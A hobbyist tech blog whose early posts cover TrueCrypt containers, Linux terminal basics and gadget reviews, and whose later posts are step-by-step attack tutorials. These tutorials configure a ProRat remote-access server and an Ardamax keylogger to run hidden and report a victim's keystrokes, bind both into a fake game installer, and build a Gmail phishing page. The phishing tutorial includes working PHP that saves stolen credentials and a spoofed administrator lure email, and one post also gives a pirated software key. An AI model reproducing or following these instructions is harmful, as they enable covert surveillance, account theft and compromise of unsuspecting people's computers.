TrueCrypt…….

So i was watching hak5 and the past two episodes have had truecrypt in them. I’ve been using truecrypt for about one or two years and I have to say that I use it a lot. I’m big on encryption and protecting my files. I encrypt everything usb drives, hard drives, and container files. One thing that caught me by surprise was the fact that cold booting can be used to get the AES encryption from your systems RAM. Now I’ve known about cold booting since MIT came out about it but its interesting to see it can be used to get data. Overall truecrypt is better than nothing. Cold boot can’t work unless someone has physical access to your computer.

I’m going to show how you can make a simple container file. If you encrypt a usb/hard drive you could lose data. So here it is:

Open truecrypt…..

Next your going to select create volume……

Select create an encrypted file container and press next…..

Now the difference between standard and hidden volumes is that the standard volume is just put your password in and a keyfile if you wanted one and your in. The hidden volume is there are two passwords lets say you have sensitive data and someone forces you to open it. You can put one password in where you might have some pictures. But the other could be what opens your sensitive data. Just to learn to use truecrypt we’ll do standard and press next you should be here now….

Choose your location then press next…

Going over the encryption types will take a long time the best explanation can be found on the truecrypt website. But I feel that cascading encryption are more secure. And i personally like to use whirlpool algorithm. Cascadeing encryption would be two or three encryptions instead of just AES you would choose AES-Twofish or Serpent-Twofish-AES. Its just a little more secure because there are ways to get AES keys if you know how to. Here are my selections…..

Then press next when you finish your selection.
The next thing you need to choose is the size from kb, mb, or gb for your file. I’ll choose 512 mb just for this example. Once you choose the size press next…..
Now we’re at the password section. To have the best possible protection use a long password around 126 characters. I like the use of key files. If you choose to use a key file it can be a picture, text file, etc. Just be aware if the first few kb of the file is changed then the key file will no longer work. So its best to use something you wont be changing.
Now where at the volume format once you press next……

The reason it asks you to move your mouse around is because it uses the random points your mouse makes to make the encryption stronger. The more you move it the stronger you encrypted file will be. Once you feel ready press format….

Once completed a little pop up box saying it was successfully completed. That’s all there is to created it. In the location you chose you should have a file like this….

In order to open the file put the file location in the main window choose a drive letter and press mount.
Then you have to put you password word and a key file if you chose to…..

Once you press okay it will be mounted to you system as if it was a real hard drive. So there you go. Play around with truecrypt and have fun learning.

Review of the WD TV….

I recently got the WDTV box which is great. For a little box that you attach a external hard drive you can watch movies, listen to music, and even see pictures. All this from your tv. It converts the videos wen viewed on your tv to 1080p so they look really good on flat screens. I bought it with a 1TB external hard drive and i have shows and movies on it. Its great and better than having 100s of dvds. The only problem i find with it is that it doesn’t play flv formats and its main format is avi but some avi movies don’t work and have to be converted again with the program it comes with. But over all it works great. I’m using the green drive by Fantom. There’s no fan and its a little slower because its a suppose to be “green” and save power. But I just use it for the movies and videos so it does a great job. This little set up is great to have for anyone who has a big movie collection or wants to rip their dvds and save it so it wont be scratched. Anyway if you want to read the specs you can see and buy it at new egg here…http://www.newegg.com/Product/Product.aspx?Item=N82E16822136325 And if you want the same set up as I have then you can get the green drive 1tb at the same place at this link http://www.newegg.com/Product/Product.aspx?Item=N82E16822204079 Check it out I think it has a use for everyone!

The New iPhone is out…

Hey so the new iPhone is out and I know there are many of you Apple fans wondering what the new features are compared to the old one. Well for one the old one had a camera that was 2 megapixels the new one had 3 megapixels with auto focusing and even video. The new one comes in 16 and 32 gigs while the older iPhone came in 8 gigs. Here are the battery life specs from the new phone
Talk time:
Up to 5 hours on 3G;
up to 12 hours on 2G

Standby time:
Up to 300 hours

Internet use:
Up to 5 hours on 3G;
up to 9 hours on Wi-Fi

Audio playback:
Up to 30 hours

Video playback:
Up to 10 hours

And now the old one:

Talk time:
Up to 5 hours on 3G;
up to 10 hours on 2G

Standby time:
Up to 300 hours

Internet use:
Up to 5 hours on 3G;
up to 6 hours on Wi-Fi

Audio playback:
Up to 24 hours

Video playback:
Up to 7 hours

There are other things but I’m not a big apple fan. Also i don’t like at&t so I think they should have just updated the original phone instead of doing a different one that look practically the same. I don’t personally have it but if you do please comment and let me know your opinion of it. Maybe you’ll persuade me to get it.

Linux Terminal Basics…..

For those of you who have read my blog before or know me know that I am a Linux fanatic. I’m no pro just yet but I’m in love with UNIX based OS’s. So I know a friend of mine who’s starting out with Linux and he asked me what he should learn first. So this is for him and all the people looking to learn how to use the Linux terminal. I like to use the Bash terminal but you can easily move over to Korn or Bourne etc. So I will explain basic navigation and commands you should know. The first thing I will explain is navigating through folders.

So lets say my terminal shell is:
warfusion@linuxX home $
Let me explain this. “warfusion” would be my username. Followed by the computers name “linuxX” and where it says home that’s the directory you are currently in. Okay so the first command will be pwd. You type this after the “$” sign like so,
warfusion@linuxX home $ pwd
when you press enter your screen will look something like this…
warfusion@linuxX home $ pwd
/home

pwd – print working directory.

Basically what pwd is just tells you what directory you are currently working in. Our example we are in the /home directory. Next is ls (the letter is L not an I) this lists the files in the directory your working in like .txt,mp3,etc. To view details about all the files in the directory type:

warfusion@linuxX home $ ls -l

That should be self explanatory. So now how do we move
to different directories or on the Windoze machine to other folders? With the command “cd”. It has nothing to do with the cd drive incase you were thinking that. “cd” stands for change directories. Lets pretend there’s a directory we want to go to in our home folder called music. Here’s how we go there :

warfusion@linuxX home $ cd home

You can also go to directories in another place other than what’s in the current folder like the following.

warfusion@linuxX home $ cd /usr/bin

So far you know how to go through directories with cd. See what’s in your current directory with ls and find out where you are with pwd. Now lets learn how to create and edit directories and text files.

Even though the modern versions of UNIX/Linux come with the GUI like the windoze operating system. The Terminal is a lot more powerful and you can do so much more faster and multi-task. So lets start off with directories. To create one we use the mkdir command which means make directory.

warfusion@linuxX home $ mkdir bin

This line will create a new directory called bin in your home directory. The file path would be /home/bin. I like each user to have their own bin directory under their user name so they have their personal place to put files. You can also create a directory anywhere else lets assume we want to make a folder in the /usr/bin directory called test.

warfusion@linuxX home $ mkdir /usr/bin/test

Now I hope that you can make directories without a problem. Now lets go to our newly created bin directory in home.

warfusion@linuxX home $ cd /home/bin
warusion@linuxX /home/bin $

The second line you should see either the path or just bin. You might not see anything at all if your not sure just use pwd to make sure your in the right bin directory.
So now I want to show you how to make a .txt file in the bin directory. So let me explain there are a few terminal text editors like Vi and emacs. For my examples I use Vi because that is my choice and my personal preference.

Anyway to open the text editor in the terminal we type in:
warfusion@linuxX /home/bin $ vi test.txt

Then you should see kind of a simple text editor that looks somewhat like “notepad”. Here you can type anything you want. (note: learn to use the text editor of your choice properly) To save press esc key then type wq. (wq means write and quit)

Once saved if you type ls in the terminal you should see
“test.txt”. A new command that you can use is the less command. This allows you to read text files so you don’t have to open a text editor to use it:

warfusion@linuxX /home/bin $ less test.txt

After you press enter it should show what is written in the file. Press esc to go back to the terminal.

These are some of the most basic commands to use in the linux terminal. If you want to learn more about these commands you can use the man command followed by the command you want to know more about.

warfusion@linuX /home/bin $ man cd

This will bring up a page telling you what cd does and any additional arguments if any. So now you have the basics and a way to find out more. I hope that you found this useful in your start with using linux.

Binding Files……..

Okay. So the last two posts were about using R.A.T.S. and Ardamax keyloggers. I will be using the Spider Binder. You can download it here Spider Binder. There are many other binders out there just look around and try them out. So we’re going to start off with our three files.

starting 3 files

The three files are setup which we will be binding to. Install which is the keylogger and server which is the R.A.T.S. After you download Spider Binder extract it and open the .exe file.

spider binder

Add all three files in spider binder.

files added to spider binder

Make sure that the key logger and server files are hidden. If you want to add a message box or change the icon now is your chance. Once done right click and click build. I’ll save mine as Setupx. You should get a message confirming success and the new file should be created. Congratulations you just made your first exploit now you can send it to a “victim” and it will install the key logger and server tools.

Creating a keylogger..

Okay so what is a keylogger? Simply put it saves everything that is typed on your computer. Depending on who made it, it can either save it to the computer like what a system admin might do or it will have it sent somewhere unknowingly to the computers owner. Let me just say the keyloggers you download are not all Completely Undetectable. So this post we’ll be using a common one called Ardamax. If you want one to be completely undetectable learn a programming language and create your own because that’s the best way.

So where do I get Ardamax? Download it or buy it Ardamax download link. Once installed there should be a little pad in the system tray and ask to be registered. Here’s registration info: Kimberly Ronald: RGA3Y3A-M3D88-T3HU5-T28TM-G47AS-SFTD7-624JC. If that doesn't work search on Google. So now open Ardamax.

What you are going to do is make the Keylogger Engine. This is what you send to your "victim". Your going to right click the pad/pen icon in the systems tray and select remote installation. And continue clicking "OK" until you get to "Appearances". Once there go to additional components and unclick log viewer. Now Go to invisibility and make sure everything is clicked. Now at security put any password you want i'll use 12345678.

Click next then at web update click next again. In options click on start in hidden mode because we don't want the victim to know what we're doing. In control set it to any time u swish to get updates about your victim I'll put every 1 hrs, have it sent to an email i would make a separate email just for this. For screen shots just put 45 minutes.

Once in destination choose where you want to save the file. Be aware make sure that open containing folder is not clicked we don't want to log ourselves. Then click next then finish. Save the keylogger in the same place as your prorat server and the next post we will bind the two files to a setup.exe to "package" our attack to be sent unknowingly to someone.

How to create a Pro Rats Sever….

This is the first post of three. Today I’ll be explaining how to use pro rats. The first thing to do is download pro rat. (Pro Rat download). Now extract the file, it will prompt you for a password. The password is pro it tells you on the download page. After the files are extracted open pro rats.

This is what you should see:

screen shot of pro rats

In the menu to the right your going to click create. A drop menu will come up and there will be three choices. They are ProRat Server, Downloader Server, and CGI Victim list. We’re going to create a ProRat server. Clicking that will bring up a new window:

creating a pro rat server

When the window opens its asking you how you want the connection i suggest the reverse connection and email. The Reverse connection should be your IP address. The Email you put in any email you want to be notified on. Now after you finish that we can move to General Settings. If you plan on sending more than one its best to name your servers so you don’t get confused by who your connected to. So this is the time to give the server a name but the default is victim1 and the default password is 123456. Make sure all the box’s under invisibility is checked. If you want a server icon then you can do so now but we will be binding the server file in a few posts from now. Pro Rats has its own binder but we will be using our own so just create the server. I like to use the skull and cross bones icon so i know what the file is. Once you click “Create Server” a loading bar will start until completed and you should hear a ding. And a pop up that says your server was created.

Remember where this file is so that we can use it in the third post. But for now you know how to create a pro rats server. If you want to know more just go through the help file or leave a comment and I’ll try to post a response here. So the next post will be on how to created a keylogger. The third and last will be to bind the server and keylogger to a file. I’ll use a small game file like maplestory.

Next few updates….

Ok over the next 3 weeks will be 3 posts. The first is how to use Pro RATS. The second one will be creating a Keylogger. The last one will be binding the 2 files to an exe like a game Setup.exe. So look for those posts. I’ll try to get them up every Monday starting next week.

Making a website Phisher.

Before I start let me just cover my ass and say I’m not responsible for anything you learn here on my page or in this post. So first pick what site your going to make a Phisher for. We’ll use Gmail as an example. So lets begin….

Step1: Create a free web page without ads like www.t35.com

Step2: Go to gmail.com once loaded right click the page or you can go to view and press view source or press ctrl + U. Now what your going to do is copy the source code from the page. Open notepad on windows or vi(or emacs) whatever text editor on linux. I don’t use mac so any plain text editor will do. Paste the source code and save it as index.php.

Step3: Now you need to look for the login section and look for action="https://www.google.com/accounts/ServiceLoginAuth?service=mail" method="post".

Change that to action="login.php" method="post".

Step4: Now we need to make a new file so open your text editor and copy and paste this code <code>

<?php
header ('Location: http://myspace.com ');
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?> </code>


What this code does is take the input from the fake login page and creates a new file called passwords.txt where it saves the input the person puts in.

Step5: Upload it to the t35.com page. The new link should be www.”yourname”.t35.com/index.php now you need to get it to the person your trying to phish.

Step6: Create a fake email at gmail like sys_admin@gmail.com or something that looks official. Then write an email something like
“Dear (email name),
We are writing to tell you that we are checking to make sure your account is secure please log in again in the link below. We are sorry for any inconvenience this may cause you. This is the link you can now login to <code> <a href=”www.”yourname”.t35.com/index.php”>Gmail Secure login</a> </code>
Sincerely,
System Administrator”
When the email goes out your link wont show and it will just be a blue hyperlink saying “Gmail Secure login”.

I hope this taught you something and you can keep your accounts safe or “help” keep others secure . By the way to get the passwords just go to www.”yourname”.t35.com/passwords.txt ok? So Until next time…

About my posts

Yeah so far I have two posts here. I’m not a professional IT or hacker…yet LOL but I do a little and also post things that I learn. I don’t mind at all if people who know more comment me because it will not only help me but the people who read my blog to learn more. Anyway I just wanted to make that clear. Also I am a hardcore linux user so a lot of my posts will probably use the linx OS. The only thing I actually use windoze for now is for school and so my mom can play games. Now that, that is out of the way I’ll be working on a post on how to make a Phisher page. If you don’t know what that is umm I’ll explain next post. If you want to follow me in my personal life I have recently started on twitter and you can follow me at “shadow123m@twitter.com” but I might start a new one with the name warfusion to mach my blog. So until my next post bye!